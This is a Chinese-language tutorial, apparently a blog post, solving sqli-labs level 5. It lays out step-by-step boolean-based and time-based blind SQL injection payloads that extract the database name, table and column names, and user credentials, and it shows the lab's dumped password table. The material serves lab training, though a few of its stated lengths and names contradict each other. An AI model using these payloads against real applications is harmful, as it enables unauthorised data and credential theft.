基于时间的 SQL 盲注-延时判断和基于布尔的 SQL 盲注

sqli-maps第五关

先尝试bool盲注实在不行才会尝试时间盲注

1.先尝试页面是否正常显示

id=1' and 1=1

id=1' and 1=2

发现了异常

2.然后判断列数

id=1' order by 3

3.然后判断数据库的类型和数据库的名字

显示判断数据库的类型:and length(@@version)>0 --+ 页面正常显示就是mysql

然后对于数据库的名字就要开始尝试:

先对数据库的名字长度开始尝试:id=1 and length(database())>5逐步尝试,然后最终确定了:id=1 and length(database())>9 此时出现了页面的错误就是说明数据库的长度是8位

然后再对数据库的名字开始尝试:

数据库的名字可能是不同的符号,数字,字母什么的就是用ascii码来转换一下,统一转换成数字

先判断数据库名字第一个是啥and ascii(substr(database(),1,1))>100 --+来确定一下范围,如果页面正常就扩大或者缩小一定的范围

-- 先确定大致范围

id=1' and ascii(substr(database(),1,1))>100 --+ → 正常(说明>100)

id=1 'and ascii(substr(database(),1,1))>64 --+ → 正常(说明>64,可能是字母)

-- 二分法精确搜索

id=1' and ascii(substr(database(),1,1))>96 --+ → 正常(说明>96,小写字母)

id=1' and ascii(substr(database(),1,1))>109 --+ → 正常(说明>109,在110-122之间)

id=1' and ascii(substr(database(),1,1))>115 --+ → 异常(说明<=115,在110-115之间)

id=1' and ascii(substr(database(),1,1))>112 --+ → 正常(说明>112,在113-115之间)

-- 精确确定

id=1' and ascii(substr(database(),1,1))=113 --+ → 异常

id=1' and ascii(substr(database(),1,1))=114 --+ → 异常

id=1' and ascii(substr(database(),1,1))=115 --+ → 正常

最终确定第一位:ASCII 115 = 's'

尝试八次就能得到数据库的名字是security

4.从security数据库里面得到相应的表的信息:

表名提取

-- 1. 表数量

id=1' and (select count(*) from information_schema.tables where table_schema='security')=5 --+(发现页面的错误)

id=1' and (select count(*) from information_schema.tables where table_schema='security')=4 --+(发现页面正常)

表有四个

-- 2. 逐位获取第一个表名

第一步:获取第一个表名的长度

-- 先用范围判断长度

id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>5 --+

id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>10 --+

id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>8 --+

id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=7 --+(出现异常)

说明第一个表的长度是6

第二步:逐位提取第一个表名的字符(跟猜数据库的步骤类似大写字母,小写字母,字母分界线先来测试范围)

假设第一个表名长度是5个字符:

第1位字符:

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 --+

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>64 --+

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>96 --+

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>109 --+

-- 使用二分法精确确定

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+ -- 'e'

逐次爆破得到第一个表是emalis

最终可以得到所有的表是:emails,referers,uagents,users

然后重复上述操作为的是得到后面需要的用户名和密码

5.得到列的数据

字段提取

用上面的方法再次操作

-- 测试ASCII范围

-- 二分法精确确定

-- 最终确定

-- 1.

id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() limit 0,1),1,1))=105--+

可以将users下的列名全部得出,为id,username,password

6.数据提取

用上面的方法再次操作

-- 1. 提取用户名

id=1' and ascii(substr((select username from users limit 0,1),1,1))=68 --+

依次提取第一个用户是 :Dumb

-- 2. 提取密码

id=1' and ascii(substr((select password from users limit 0,1),1,1))=68 --+

依次提取第一个密码是:Dumb

+----+----------+------------+

| id | username | password |

+----+----------+------------+

| 1 | Dumb | Dumb |

| 2 | Angelina | I-kill-you |

| 3 | Dummy | p@ssword |

| 4 | secure | crappy |

| 5 | stupid | stupidity |

| 6 | superman | genious |

| 7 | batman | mob!le |

| 8 | admin | admin |

| 9 | admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 | dhakkan | dumbo |

| 14 | admin4 | admin4 |

+----+----------+------------+

如果要时间盲注只需要加上if和sleep的条件就行:

比如最后的id=1' and ascii(substr((select password from users limit 0,1),1,1))=68 --+只需要改成:

id=1' and if(ascii(substr((select password from users limit 0,1),1,1))=68,sleep(5),0)--+

相关推荐
全栈老石2 小时前
拆解低代码引擎核心:元数据驱动的"万能表"架构
数据库·低代码
倔强的石头_21 小时前
kingbase备份与恢复实战(二)—— sys_dump库级逻辑备份与恢复(Windows详细步骤)
数据库
jiayou642 天前
KingbaseES 实战:深度解析数据库对象访问权限管理
数据库
李广坤3 天前
MySQL 大表字段变更实践(改名 + 改类型 + 改长度)
数据库
爱可生开源社区4 天前
2026 年,优秀的 DBA 需要具备哪些素质?
数据库·人工智能·dba
随逸1774 天前
《从零搭建NestJS项目》
数据库·typescript
加号35 天前
windows系统下mysql多源数据库同步部署
数据库·windows·mysql
シ風箏5 天前
MySQL【部署 04】Docker部署 MySQL8.0.32 版本(网盘镜像及启动命令分享)
数据库·mysql·docker
李慕婉学姐5 天前
Springboot智慧社区系统设计与开发6n99s526(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库·spring boot·后端
百锦再5 天前
Django实现接口token检测的实现方案
数据库·python·django·sqlite·flask·fastapi·pip